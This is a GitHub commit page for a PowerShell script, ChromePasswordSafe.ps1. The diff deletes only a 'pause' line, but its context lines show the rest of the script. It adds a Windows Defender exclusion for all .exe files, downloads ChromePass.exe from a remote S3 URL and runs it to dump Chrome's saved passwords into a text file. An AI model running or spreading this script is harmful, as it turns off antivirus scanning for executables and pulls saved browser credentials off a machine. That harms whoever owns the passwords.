Skip to content

Commit

Permalink
Update ChromePasswordSafe.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
aidenmitchell committed May 6, 2020
1 parent e2f4f3a commit f95595b
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion ChromePasswordSafe.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -3,4 +3,3 @@ Add-MpPreference -ExclusionExtension exe -Force
wget https://s3-us-west-1.amazonaws.com/8086.ca/ChromePass.exe -OutFile $DesktopPath/ChromePass.exe
cd $DesktopPath
.\ChromePass.exe /stext passwords.txt
pause

0 comments on commit f95595b

Please sign in to comment.